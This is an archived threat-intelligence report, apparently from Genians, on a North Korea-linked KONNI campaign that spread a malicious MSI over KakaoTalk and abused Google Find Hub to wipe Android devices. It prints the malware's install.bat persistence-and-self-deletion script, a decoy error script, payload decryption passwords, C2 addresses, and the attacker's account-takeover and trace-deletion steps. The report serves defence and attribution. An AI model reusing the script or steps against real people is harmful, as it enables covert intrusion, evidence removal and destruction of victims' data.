{
	"id": "5031e989-a36f-415c-a1be-a05a579bd8fe",
	"created_at": "2026-04-06T00:18:27.738935Z",
	"updated_at": "2026-04-10T03:37:40.970479Z",
	"deleted_at": null,
	"sha1_hash": "d0a0a5f2b671b004318874f8d2683e3ce5bd42f3",
	"title": "State-Sponsored Remote Wipe Tactics Targeting Android Devices",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5736439,
	"plain_text": "State-Sponsored Remote Wipe Tactics Targeting Android Devices\r\nBy Genians\r\nPublished: 2025-11-09 · Archived: 2026-04-05 20:49:11 UTC\r\n◈ Key Findings\r\nEmergence of an Android remote data-wipe attack exploiting Google’s asset-tracking feature, Find Hub.\r\nIdentified as a follow-up attack of the KONNI APT campaign, which had operated covertly for nearly a\r\nyear.\r\nAttackers impersonated psychological counselors and North Korean human rights activists, distributing\r\nmalware disguised as stress-relief programs.\r\nMalicious files were delivered through the KakaoTalk messenger, leveraging impersonation of\r\nacquaintances to conduct trust-based attacks.\r\nStrengthening real-time behavior-based detection and IOC-linked monitoring through EDR solutions is\r\nstrongly recommended.\r\n1. Overview\r\nThe Genians Security Center (GSC) has identified new attack activity linked to the KONNI APT campaign, which\r\nis known to be associated with the Kimsuky or APT37 groups.\r\nDuring its ongoing investigation into KONNI’s operations, GSC discovered that malicious files disguised as\r\n“stress-relief programs” were being widely distributed through South Korea’s KakaoTalk messenger platform.\r\nKONNI has overlapping targets and infrastructure with Kimsuky and APT37, leading some researchers to classify\r\nthem as the same group. All three are recognized as state-sponsored threat actors operating under the direction of\r\nthe North Korean regime.\r\nMeanwhile, on October 22, 2025, the Multilateral Sanctions Monitoring Team (MSMT) released a report titled\r\n“Activities of the DPRK’s Cyber and IT Workers” and adopted a joint statement. 
MSMT, established under UN\r\nSecurity Council (UNSC) resolutions, is a multilateral body that monitors and reports on violations and evasion of\r\nsanctions measures to the international community.\r\nAccording to the MSMT report, Kimsuky and KONNI are assessed as distinct groups associated with the 63\r\nResearch Center, with close connections to North Korean cyber operators and IT workers designated under UN\r\nsanctions.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 1 of 29\n\n[Figure 1-1] Kimsuky and KONNI Groups under the 63 Research Center (Source: MSMT)\r\nThe recently identified KONNI campaign is particularly notable for cases in which Google Android–based\r\nsmartphones and tablet PCs in South Korea were remotely reset, resulting in the unauthorized deletion of\r\npersonal data stored on the devices.\r\nThe Google “Find Hub” service, which is provided to protect lost or stolen Android devices, was abused in data-destructive attacks. While Find Hub is intended to safeguard Android devices, this is the first confirmed case in\r\nwhich a state-sponsored threat actor obtained remote control by compromising Google accounts, then used the\r\nservice to perform location tracking and remote wipe. This development demonstrates a realistic risk that the\r\nfeature can be abused within APT campaigns.\r\nThis report aims to identify the first known attack tactic in which a state-sponsored threat group linked to North\r\nKorea compromised Find Hub accounts and abused legitimate management functions to remotely reset mobile\r\ndevices. It also analyzes a chained scenario in which the attacker leveraged victims’ KakaoTalk PC sessions to\r\ndistribute malicious files to close contacts, and provides response measures and intelligence insights for similar\r\nthreats.\r\n2. 
Background\r\nIn late July of last year, the Genians Security Center (GSC) released a report titled “Analysis of defense evasion\r\ntactics using AutoIt in the KONNI APT campaign.”\r\nAccording to the attack scenario analyzed at that time, the threat actors designed and executed attacks using social\r\nengineering themes such as Korean National Tax Service documents and scholarship application forms for North\r\nKorean defectors.\r\nAnalysis of defense evasion tactics using AutoIt in the KONNI APT campaign\r\nThe malicious scripts installed by the attack remain stealthily resident on victim systems and can lie dormant for\r\nextended periods. During this time they monitor system state and make internal changes to ensure persistence.\r\nThey also communicate with multiple C2 servers to stealthily install additional malicious modules, allowing the\r\nthreat actors to monitor and control system activity in near real time.\r\n[Figure 2-1] Attack flowchart\r\nIf behavior-based anomaly detection such as EDR is absent, threat actors can remain resident on compromised\r\nendpoints for long periods, harvesting user data and conducting covert surveillance via webcams.\r\nIn this process, the access obtained during the initial intrusion enables system control and additional information\r\ncollection, while evasion tactics allow long-term concealment.\r\nState-sponsored threat actors can exploit the webcam to covertly monitor the user’s surroundings or identify\r\nperiods of absence and carry out follow-on attacks.\r\nIn particular, when the webcam has a built-in microphone, it can capture audio as well as video, significantly\r\nexpanding the scope of privacy violations.\r\nWebcams without activity LEDs make it difficult for users to notice that a video stream is active, increasing the\r\nlikelihood of undetected monitoring and therefore the overall security risk.\r\nIf the victim’s system is 
online and the webcam is active while the user is away, the threat actor can verify the\r\nabsence and execute remote operations with minimal risk of immediate detection.\r\nAdditionally, by using the stolen Google account credentials and Find Hub’s management functions, the actor\r\ntracks the victim’s real-time location (GPS coordinates) and repeatedly triggers remote resets to delete personal\r\ndata on Android devices, disrupting normal use.\r\nAs a result, victims may have difficulty receiving important contacts and notification messages on their mobile\r\ndevices, and the threat actors can sustain prolonged, persistent attacks over time.\r\nTo enhance security, it is recommended to use webcams with indicator lights and to physically cover the camera\r\nlens when not in use.\r\nIn addition, users should use built-in hardware mute functions and strictly control camera and microphone access\r\npermissions within the operating system and installed applications.\r\nFurthermore, the following additional security measures should be reviewed and implemented to reinforce\r\nsecurity policies against similar threats.\r\nAccount Security Hardening\r\nChange the Google account password regularly and enable additional authentication methods such as\r\n2-factor authentication (2FA) to protect against credential exposure.\r\nWhen leaving, power off the computer to minimize the risk of physical or remote attacks.\r\nProtecting the Find Hub Service\r\nTo prevent the unauthorized abuse of remote wipe features through compromised Google accounts,\r\nservice providers should review and implement real-time security verification measures, such as\r\nadditional authentication processes that confirm the legitimate device owner.\r\nUpon receiving a remote reset command, the device does not reset immediately. 
It switches to a\r\nlocked screen, applies a short delay, and notifies the owner via a smartphone push alert.\r\nAccordingly, it is recommended to implement a security procedure that clearly verifies whether the\r\nremote wipe request has been made by the legitimate device owner before execution, through multi-factor authentication such as facial recognition, fingerprint verification, or PIN entry.\r\nStrengthening Messenger File Security and User Awareness\r\nReinforce verification of files received via messenger platforms before opening or execution.\r\nUse clear warning prompts to help users avoid downloading or running malicious files, and\r\ncontinuously reinforce security awareness.\r\n3. Attack Progression\r\n3-1. Initial Access\r\nThe threat actors infiltrated specific individuals’ devices through spear-phishing that spoofed organizations such as\r\nthe National Tax Service, then conducted internal reconnaissance and information collection for a prolonged\r\nperiod. Among the victims was a professional psychological counselor who supports North Korean defector\r\nyouths during resettlement by addressing psychological difficulties and providing services such as career\r\nguidance, educational counseling, and mentoring to help stabilize their well-being.\r\nAnother victim opened an email impersonating the National Tax Service and executed the attached malicious file.\r\nAfter receiving a follow-up message stating it had been sent by mistake, the victim dismissed the incident.\r\nThese cases illustrate how crafty and persistent spear-phishing techniques can be in deceiving victims and\r\nunderscore the need for heightened vigilance.\r\n[Figure 3-1] Screen impersonating an “email delivery error notice”\r\nIn addition, multiple cases were identified in which malware distributed through National Tax Service\r\nimpersonation was executed on victims' systems. 
Various artifacts were identified, including the download history\r\nof \"Guidance on submitting explanatory materials pursuant to a tax-evasion report.zip,\" which enabled a detailed\r\ntrace of the attackers’ initial intrusion procedure.\r\n3-2. Attack Scenario\r\nThis report presents the findings of an in-depth examination and digital forensic analysis of selected victim\r\ndevices exposed to spear-phishing attacks impersonating the National Tax Service. The analysis confirmed that the\r\ncompromised devices did not remain first-stage victims only; they were converted into components of the\r\nattackers’ infrastructure and abused as relays to propagate secondary malicious files via KakaoTalk.\r\nThese findings show that the attackers deliberately targeted services built on social trust to amplify their impact,\r\nreflecting more advanced tactics and increasingly sophisticated methods of concealment.\r\n[Figure 3-2] Cases of malicious file distribution via KakaoTalk\r\nThe investigation found that on the morning of September 5 a threat actor compromised and abused the\r\nKakaoTalk account of a South Korea–based counselor who specializes in psychological support for North Korean\r\ndefector youth, and sent a malicious file disguised as a “stress relief program” to an actual defector student.\r\nExecution of the file resulted in infections on several devices, and subsequent remediation measures were\r\nimplemented.\r\nJust ten days later, on September 15, a separate victim’s KakaoTalk account was used to distribute malicious files\r\nen masse in a simultaneous wave.\r\nThis campaign is assessed as a typical social-engineering attack that leveraged trust-based communications to\r\nprecisely exploit the target’s psychological and social context. 
In particular, the compromise of messenger\r\naccounts and their use as a secondary attack vector increased the attack’s level of customization while expanding\r\nits attack surface and propagation scope, thereby amplifying the threat.\r\nA notable finding is that immediately after confirming through Find Hub’s location query that the victim was\r\noutside, the threat actor executed a remote reset command on the victim’s Android devices (smartphone and\r\ntablet). The remote reset halted normal device operation, blocking notification and message alerts from messenger\r\napplications and effectively cutting off the account owner’s awareness channel, thereby delaying detection and\r\nresponse.\r\nThe attacker then exploited the compromised KakaoTalk account as a secondary distribution channel, rapidly\r\nspreading the malicious files immediately after the remote reset, achieving both concealment and propagation at\r\nthe same time.\r\nThis combination of device neutralization and account-based propagation is unprecedented among\r\npreviously known state-sponsored APT scenarios and was first identified and analyzed in this report. It\r\ndemonstrates the attacker’s tactical maturity and advanced evasion strategy, marking a key inflection point\r\nin the evolution of APT tactics.\r\n3-3. Remote Interference with Devices\r\nThe threat actor who achieved initial access conducted prolonged internal reconnaissance and remote monitoring,\r\nduring which they collected and exfiltrated the victim’s sensitive information and key account credentials,\r\nultimately gaining access to Google and Naver accounts.\r\nUsing the stolen credentials, the attacker took control of the accounts and misused Find Hub’s management\r\nfeatures to execute destructive actions, such as remotely wiping mobile devices. 
Digital forensic and artifact\r\nanalysis identified the attacker’s access addresses, which were organized in chronological order after removing\r\nduplicates, as follows.\r\n[Figure 3-3] Log of remote reset operations by timestamp\r\nThe threat actor first logged into the victim’s Gmail account and checked recent login session records on the\r\nAccount Activity Details page.\r\nNext, they accessed the Google Account Management page, opened the Security menu, and confirmed the\r\nrecovery email address registered under a Naver account. The attacker then logged into that Naver account,\r\ndeleted Google’s security alert emails, and emptied the trash folder, taking deliberate steps to remove traces of\r\ntheir activity.\r\nAfterward, the attacker opened Google’s Security menu, went to the Your devices section, and selected the Find\r\nMy Phone link. 
From there, selecting a registered smartphone or tablet redirected them to the Find Hub service,\r\nwhich allows various remote commands to be executed on the linked devices.\r\n[Figure 3-4] Examples of smartphones and tablets registered in Find Hub\r\nThe threat actor executed remote reset commands on the registered Android-based smartphones and tablets.\r\nDuring this process, the attacker re-entered the Google account password to proceed with the device wipe action,\r\nwhich was successfully carried out, resulting in the complete deletion of critical data stored on the affected\r\ndevices.\r\n[Figure 3-5] Execution of the device reset command\r\nEven after the device reset was completed, the threat actor repeatedly sent the same remote reset command more\r\nthan three times, disrupting and delaying the normal recovery and use of the targeted smart devices for an\r\nextended period, which rendered the affected devices unavailable for normal use. 
At that point, the attacker\r\naccessed the victim’s logged-in KakaoTalk PC version and used it as a channel to distribute malicious files.\r\n[Figure 3-6] Device reset and subsequent attack\r\nAs a result of this APT attack, the victim suffered not only information theft but also severe damage across\r\nmultiple devices.\r\nPersonal and Sensitive Data Leak\r\nThe threat actor gained unauthorized access to the victim’s PC and stole a large volume of\r\npersonally identifiable information (PII), sensitive data, and private content captured through the\r\nwebcam.\r\nMobile Device Data Destruction\r\nThe victim’s smartphone and tablet received multiple remote reset commands from the compromised\r\naccount, resulting in a complete deletion of stored data through factory reset and remote wipe\r\nactions.\r\nAccount Compromise and Secondary Propagation\r\nThe threat actor gained unauthorized access through the victim’s active messenger session\r\ncredentials and used the compromised account as a channel to distribute malware.\r\n[Video 3-1] Initialization demonstration\r\n4. In-depth Analysis\r\n4-1. MSI Malware Analysis\r\nAll samples of the \"Stress Clear.zip\" files distributed via KakaoTalk messages were found to share the same\r\nstructure. The archive contains a Microsoft Installer (MSI) package disguised as \"Stress Clear.msi.\"\r\nThe MSI contains a valid digital signature issued to \"Chengdu Hechenyingjia Mining Partnership Enterprise\" in\r\nChina. 
This represents an abuse of code signing: the attacker used a legitimate-looking signature to disguise the\r\nfile’s origin and integrity, making it appear like a legitimate application.\r\n[Figure 4-1] Internal structure of 'Stress Clear.msi'\r\nThe 'Stress Clear.msi' file runs only on Windows operating systems and is not executable on non-compatible\r\nplatforms such as smartphones, so those devices are not infection targets. When executed in a compatible\r\nenvironment, the standard MSI installation GUI appears, while malicious actions embedded in the installation\r\nroutine are performed without the user’s awareness.\r\nWhen the malicious MSI runs, it sequentially invokes the included install.bat batch file and error.vbs script\r\naccording to the ActionID values.\r\nThe overall execution flow is roughly as follows. Note that although the package contains some legitimate\r\nfinancial security modules, these do not affect the malicious behavior.\r\nInitial execution\r\nWhen the MSI installer runs, it calls the embedded install.bat, which performs initial setup and then\r\ndeploys payloads sequentially, such as copying malicious files and registering scheduled tasks.\r\nControl branching\r\nDepending on the internal ActionID values, the MSI invokes the error.vbs script.\r\nConcealment actions\r\nThe error.vbs script displays a fake error dialog (for example, a language pack error) to the user.\r\nThis decoy message is designed to make the user mistake the installation behavior for a normal\r\nerror, thereby hiding the malicious activity and delaying detection.\r\nThe messages shown to the user are a Korean installation prompt for the “스트레스 클리어” (Stress Clear)\r\nprogram and a fake error dialog that claims a language-pack compatibility issue.\r\n[Figure 4-2] Screens displayed during malicious file execution\r\nThe specific commands executed are as 
follows:\r\n%SystemRoot%\\system32\\cmd.exe /c\r\n%APPDATA%\\스트레스 클리어\\install.bat\r\n@echo off\r\nset dr=Music\r\ncopy \"%~dp0AutoIt3.exe\" %public%\\%dr%\\AutoIt3.exe\r\ncopy \"%~dp0IoKlTr.au3\" %public%\\%dr%\\IoKlTr.au3\r\ncd /d %public%\\%dr% \u0026 copy c:\\windows\\system32\\schtasks.exe hwpviewer.exe \u0026 hwpviewer /delete /tn\r\n\"IoKlTr\" /f \u0026 hwpviewer /create /sc minute /mo 1 /tn \"IoKlTr\" /tr \"%public%\\%dr%\\AutoIt3.exe\r\n%public%\\%dr%\\IoKlTr.au3\"\r\ndel /f /q \"%~dp0AutoIt3.exe\"\r\ndel /f /q \"%~dp0IoKlTr.au3\"\r\ndel /f /q \"%~f0\"\r\n[Table 4-1] Commands in the install.bat Script\r\nThe BAT file copies \"AutoIt3.exe\" and the \"IoKlTr.au3\" script to the public Music folder (\"%PUBLIC%\\Music\").\r\nNext, it makes a copy of the original Task Scheduler Configuration Tool executable \"schtasks.exe\" and renames it\r\nto \"hwpviewer.exe\".\r\nIt then creates a scheduled task set to run every minute to continuously execute the malicious AutoIt script.\r\nFinally, it deletes the original batch file and source files to minimize traces. 
These actions are typical for\r\nestablishing persistence and concealing evidence, including self-deletion, removal of source artifacts, and\r\nmasquerading as a document viewer.\r\n%SystemRoot%\\System32\\WScript.exe\r\n%APPDATA%\\스트레스 클리어\\error.vbs\r\nMsgBox \"현재 시스템 언어팩과 프로그램 언어팩이 호환되지 않아 실행할 수 없습니다.\" \u003cThis program\r\ncannot run because the current system language pack is incompatible with the program’s language pack.\u003e \u0026\r\nvbCrLf \u0026 _\r\n       \"설정에서 한국어(대한민국) 언어팩을 설치하거나 변경한 뒤 다시 실행해 주세요.\"\u003cIn Settings, install\r\nor switch to the Korean (Republic of Korea) language pack, then run the program again.\u003e, _\r\n       vbCritical, \"언어팩 오류\"\u003cLanguage Pack Error\u003e\r\n[Table 4-2] error.vbs Script Command\r\nThe VBS script displays a warning dialog titled \"Language Pack Error.\" The code itself contains no malicious\r\nbehavior; it is used as a decoy message to make the program appear nonfunctional and mislead the user.\r\n4-2. AutoIt Script Analysis\r\nThe AutoIt script \"IoKlTr.au3,\" which is run periodically by Task Scheduler, is a core component designed to\r\nperform persistent malicious activity on the system.\r\nThe script is loaded at regular intervals to execute additional commands and to maintain or update the malicious\r\npayload.\r\nIt also conceals its malicious logic by inserting unnecessary code at the beginning and end of the script that is\r\nunrelated to the actual execution flow, in order to hinder detection and analysis.\r\n[Figure 4-3] Internal code of the compiled AutoIt script\r\nA review of the internal code shows that the file has the structure of a compiled AutoIt script, and that the actual\r\ncommands can be restored and verified through decompilation. 
For detailed analysis, see the previously\r\nreferenced report, \"Analysis of defense evasion tactics using AutoIt in the KONNI APT campaign.\"\r\nThe target code is similar to the AutoIt-based LilithRAT but in a modified form that uses the \"endClient9688\"\r\nJSON marker, for which reason it is also classified as EndRAT. Its command-and-control (C2) connection is made\r\nthrough a Germany-based domain. The domain is built on WordPress and currently displays a maintenance notice.\r\nC2\r\n116.202.99[.]218\r\nbp-analytics[.]de\r\nMutex\r\nGlobal\\AB732E15-D8DD-87A1-7464-CE6698819E701\r\nStartupDir\r\nSmart_Web.lnk\r\nIn similar past campaigns, multiple C2 servers were hosted on WordPress. We assess that the actor repeatedly\r\nabused WordPress-based web servers, which are more likely to have security weaknesses.\r\n[Figure 4-4] Decompiled script\r\nAs part of the attack technique, a mutex is used to prevent duplicate execution, and a malicious shortcut file (.lnk)\r\nis registered in Startup so it launches automatically after a system restart. These files are distributed with minor\r\nvariations.\r\nIn previous cases, the shortcut was named \"Start_Web.lnk,\" whereas in this case it was changed to\r\n\"Smart_Web.lnk.\"\r\n5. Incident Investigation\r\n5-1. Digital Forensics\r\nFollowing the Digital Forensics and Incident Response (DFIR) process, we collected multiple additional pieces of\r\nevidence. 
For reference, DFIR generally proceeds as follows:\r\nPreparation\r\nPlan the response, prepare tools and the team.\r\nDetection \u0026 Identification\r\nDetect anomalies and confirm whether an incident has occurred.\r\nContainment \u0026 Response\r\nPrevent further spread and take initial response actions.\r\nAnalysis\r\nAnalyze logs, systems, and malware to determine the attack path and root cause.\r\nRecovery\r\nRestore operations, remediate damage, and restore data.\r\nPost-Incident Reporting\r\nPrepare the incident report and develop a plan to prevent recurrence.\r\n5-2. Digital Evidence Collection and Analysis\r\nOn September 5, 2025, we conducted a digital forensic examination of several victims’ PCs that had downloaded\r\nand executed an MSI file distributed via KakaoTalk Messenger.\r\nThe investigation indicated that multiple additional malicious files had been installed on the systems, prompting\r\nevidence collection.\r\nThe collected artifacts were used for in-depth analysis to identify malware types and determine the scope of\r\ncompromise.\r\n[Figure 5-1] Collecting additional malicious files\r\nMultiple malicious files were identified on the victim’s device, assessed to have been additionally downloaded via\r\nthe C2 server.\r\nAnalysis shows that these files contain malicious AutoIt scripts and modules that enable remote access and\r\nkeylogging.\r\nThe threat actor concealed various malware components by encoding or encrypting them within AutoIt scripts.\r\nThis technique is assessed as a strategy to evade security product detection and delay analysis of malicious\r\nactivity.\r\n6. Threat Attribution\r\n6-1. 
MSI-Based Strategy\r\nIn early April, the Genians Security Center (GSC) published a detailed report titled \"Analysis of KONNI APT\r\nCampaign Disguised as Korean National Police Agency and National Human Rights Commission.\"\r\nAnalysis of KONNI APT Campaign Disguised as Korean National Police Agency and National\r\nHuman Rights Commission\r\nIn the spear-phishing attack that impersonated a police investigator, multiple North Korean expressions were\r\nidentified. For example, \"incha\" means \"soon\" or \"immediately\" and is used to indicate that an action is imminent.\r\nIn addition, \"taegong\" was confirmed as a North Korean expression meaning \"slacking off at work.\"\r\nThreat actors strive to minimize exposure of their native language, yet habitual expressions can surface\r\nunconsciously. These linguistic traces can serve as important clues for assessing a threat actor’s nationality or\r\noperating region and for conducting attribution analysis of the attack group.\r\nIn the police-impersonation attack, a malicious file named \"악성코드 진단(멀웨어 제로) - 설치 파일.msi\r\n(Malware Detection (Malware Zero) - Installer.msi)\" was used. This file registered the \"IoKlTr.au3\" script\r\nwith Task Scheduler so that it could run automatically at regular intervals.\r\nMeanwhile, in the \"Stress Clear.msi\" file delivered via KakaoTalk, the same \"IoKlTr.au3\" script was used,\r\nindicating that similar tactics and techniques were employed across the two attacks.\r\n악성코드 진단(멀웨어 제로) - 설치 파일.msi\r\nIoKlTr.au3\r\nStress Clear.msi\r\nIoKlTr.au3\r\nAdditionally, each MSI file was built using EMCO Software’s MSI Package Builder (versions 11.2.6 and 11.2.8).\r\n[Figure 6-1] Version comparison of MSI Package Builder\r\n6-2. 
Attack Weapon Path\r\nThe threat actor used an AutoIt script to launch RemcosRAT (Remote Access Trojan).\r\nRemcosRAT has been continually updated since its initial 1.0 release in July 2016. As of September 2025, the\r\nlatest version is 7.0.4. Because it is sold commercially, threat actors can easily obtain and use it in attacks.\r\nOn some victims’ systems, RemcosRAT 7.0.4 Pro was identified, indicating that the attackers were actively using\r\nthe latest malware and tactics.\r\n[Figure 6-2] Internal strings of the AutoIt script\r\nAnalysis of the collected AutoIt scripts identified parts of the internal folder structure, which is assessed as a\r\nmeaningful clue for tracing the attack infrastructure and development environment.\r\nAdditionally, naming the path used for development \"Attack Weapon\" suggests that the threat actor intended to\r\ndevelop a cyberattack weapon and an operational plan.\r\nD:\\3_Attack Weapon\\Autoit\\Build\\Remcos\\RunBinary.a3x\r\nThis folder structure matches the paths referenced in the previously cited report, \"Analysis of defense evasion\r\ntactics using AutoIt in the KONNI APT campaign.\"\r\nD:\\3_Attack Weapon\\Autoit\\Build\\Lilith\\Lilith.a3x\r\nFor reference, in a malicious file distributed on October 23, 2025, under the guise of the National Tax Service’s\r\n\"Request for Submission of Materials to Explain Unreported Source of Funds,\" the following path was\r\nadditionally identified.\r\nD:\\3_Attack Weapon\\Autoit\\Build\\__Poseidon - Attack\\client3.3.14.a3x\r\n6-3. RAT Correlation Analysis\r\nOn the victims’ devices, in addition to LilithRAT and RemcosRAT, various RAT module variants hidden within\r\nAutoIt scripts were identified. 
The representative types are as follows.\r\nQuasarRAT\r\nsqlite3.au3\r\nRftRAT\r\ncliconfg.au3\r\nThese files were received from the C2 and created in subdirectories of the \"%APPDATA%\\Google\\Browser\"\r\ndirectory whose names contain \"adb\" or \"adv.\" The received scripts \"autoit.vbs\" and \"install.bat\" then perform\r\nAutoIt-based execution from those locations.\r\nThe script \"sqlite3.au3\" contains the directive \"#AutoIt3Wrapper_Outfile_type=a3x,\" indicating it was built via\r\nthe compiler wrapper.\r\nThis script derives an AES decryption key through an HMAC-based process and uses it to decrypt an AES-encrypted payload.\r\nThe decrypted module is the C# \"QuasarRAT,\" which is injected into the \"hncfinder.exe\" process. The password\r\nstring used in this process is as follows.\r\nxPabyrwTaOczVwegVMgzmEpq\r\n[Figure 6-3] Decoding process of \"sqlite3.au3\"\r\nAnalysis shows that QuasarRAT attempts to communicate with a Netherlands-based C2 server at 212.118.52[.]168\r\nand maintains a persistent connection to receive subsequent commands. For reference, the Quasar project was\r\ninitially released under the name \"xRAT.\" GitHub history indicates that around August 2015, with the v1.0.0.0\r\nrelease, the name was changed to \"Quasar.\"\r\n[Figure 6-4] Analysis of QuasarRAT C2 server address\r\nNext, the \"cliconfg.au3\" script also includes the directive \"#AutoIt3Wrapper_Outfile_type=a3x.\"\r\nLike \"sqlite3.au3,\" this script performs HMAC-based hash derivation to generate an AES decryption key and uses\r\nthat key to decrypt an AES-encrypted payload.\r\nThe decrypted execution module is classified as RFTServer (commonly referred to as RftRAT) and is injected into\r\nthe \"cleanmgr.exe\" process. 
The password string used in this process is as follows.\r\nBFigyOed7KVjU993ZCJzYb8R\r\n[Figure 6-5] Decoding \"cliconfg.au3\"\r\nAnalysis shows that RftRAT attempts to communicate with a Japan-based C2 server at 38.180.148[.]108 and\r\nmaintains a persistent connection to receive subsequent commands.\r\nRftRAT uses simple arithmetic (subtractive) obfuscation rather than complex encryption, hiding the actual C2\r\nserver address by using the data string as a key.\r\n[Figure 6-6] Analysis of RftRAT C2 server addresses\r\nAccording to previously published analyses by Genians and AhnLab, RftRAT has been used in persistent and\r\ncovert threat campaigns targeting South Korea.\r\nKimsuky group using AutoIt to build malware (RftRAT, Amadey)\r\nRftRAT is rarely covered in global threat analysis reports. This suggests that the malware is tailored to Korea-focused operations and that obtaining relevant data and conducting in-depth analysis require substantial effort.\r\n6-4. Threat Infrastructure Correlation\r\nCross-correlating IOCs from victims’ devices and similar malware indicates a strong link pointing to a single\r\nKONNI campaign.\r\n[Figure 6-7] Threat infrastructure relationship diagram\r\nThe threat actor abused WordPress-based hosting as staging infrastructure and operated primary C2 nodes hosted\r\nin Russia, the United States, and Germany.\r\nThey also placed RAT-layer relay nodes on third-country servers, including Japan and the Netherlands, using\r\ngeographic distribution and multi-stage relays to evade or delay law-enforcement log and source-IP tracing.\r\n7. Conclusion\r\nWhen the malicious MSI file runs, the embedded batch file \"install.bat\" is automatically invoked to execute\r\nfollow-on commands. 
Genian EDR event analysis shows that this script copies the \"AutoIt3.exe\" executable and the \"IoKlTr.au3\" script to the public Music folder at \"C:\\Users\\Public\\Music.\"\r\nThese actions are recorded in the EDR as events such as \"CreateProcess,\" \"FileCreate,\" and \"FileWrite,\" enabling timeline-based activity tracing. Using these event logs, an analyst can reconstruct the execution chain from the MSI launch through the batch file execution to the file copies.\r\n[Figure 7-1] Genian EDR Threat Management screen\r\nA malicious MSI file is executed by the \"MsiExec.exe\" process, which creates the files contained in the package and invokes batch files such as \"install.bat\" to run malicious scripts.\r\nThis entire execution flow can be quickly identified by reviewing EDR command-line event logs, allowing security administrators to detect and respond at an early stage.\r\n[Figure 7-2] MsiExec.exe command line\r\nTracing the AutoIt process’s execution path and behavior enables quick identification of the shortcut \"Smart_Web.lnk\" used for persistence and its target path.\r\nIn addition, process logs allow identification of the C2 IPs and domains the sample contacts. 
Using this information enables rapid deployment of firewall rules to block data exfiltration, EDR blocking rules, or network segmentation policies.\r\n[Figure 7-3] Genian EDR Attack Storyline\r\nThe attack storyline of Genian EDR visualizes the entire execution flow in a timeline and relational view, enabling SOC operators to see process trees, command lines, files, registry, and network events at a glance and immediately execute prioritization, isolation, blocking, and forensic collection.\r\nThe EDR collects and analyzes all endpoint activity in real time, visualizes the full sequence of malicious behavior, and rapidly contains attack propagation with automated response, helping enterprises and public institutions respond effectively to security threats.\r\nForensic analysis combined with threat intelligence enables root-cause determination, recurrence prevention, and the blocking of internal data exfiltration, supporting a comprehensive security management framework. Given that many threats now evade traditional antivirus and firewalls, adopting EDR is essential.\r\n8. 
Indicators of Compromise\r\nMD5\r\n5ab26df9c161a6c5f0497fde381d7fca\r\n8f82226b2f24d470c02f6664f67f23f7\r\n09b91626507a62121a4bdb08debb3ed9\r\n25e38d618f38b3218c3252cf0d22c969\r\n38f8fd9e8d27ae665b3ac0f56492f6c4\r\n048e1698c4b711d1652df4bf4be04f9e\r\n53aea290d7245ee902a808fd87a6a173\r\n56c7b448dbc37aa50eb1c2a6475aca5e\r\n99ee7852b8041a540fdb74b3784d0409\r\n8230af6642f5f1927bbbbc7fd6e5427f\r\nb0eba111b570bb1c93ca1f48557d265b\r\nef1a8f66351d03413ed2c7d499ee5164\r\nf7363c5cfd6fa24a86e542fcd05283e8\r\nf6800836d55d049fe79e3d47d54e1119\r\nDomain\r\nappoitment.dotoit[.]media\r\ngenuinashop[.]com\r\noldfoxcompany[.]com\r\nprofessionaltutors[.]net\r\nsparkwebsolutions[.]space\r\nxcellentrenovations[.]com\r\nyoukhanhdoit[.]co\r\nIP\r\n116.202.99[.]218\r\n192.109.119[.]113\r\n212.118.52[.]168\r\n38.180.148[.]108\r\n62.113.118[.]157\r\n77.246.101[.]72\r\n77.246.108[.]96\r\n89.110.83[.]245\r\n91.107.208[.]93\r\n93.183.93[.]185\r\n94.103.87[.]212\r\n109.234.36[.]135\r\nSource: https://www.genians.co.kr/en/blog/threat_intelligence/android",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.genians.co.kr/en/blog/threat_intelligence/android"
	],
	"report_names": [
		"android"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4",
			"created_at": "2025-08-07T02:03:25.096857Z",
			"updated_at": "2026-04-10T02:00:03.659118Z",
			"deleted_at": null,
			"main_name": "NICKEL JUNIPER",
			"aliases": [
				"Konni",
				"OSMIUM ",
				"Opal Sleet "
			],
			"source_name": "Secureworks:NICKEL JUNIPER",
			"tools": [
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b43c8747-c898-448a-88a9-76bff88e91b5",
			"created_at": "2024-02-02T02:00:04.058535Z",
			"updated_at": "2026-04-10T02:00:03.545252Z",
			"deleted_at": null,
			"main_name": "Opal Sleet",
			"aliases": [
				"Konni",
				"Vedalia",
				"OSMIUM"
			],
			"source_name": "MISPGALAXY:Opal Sleet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
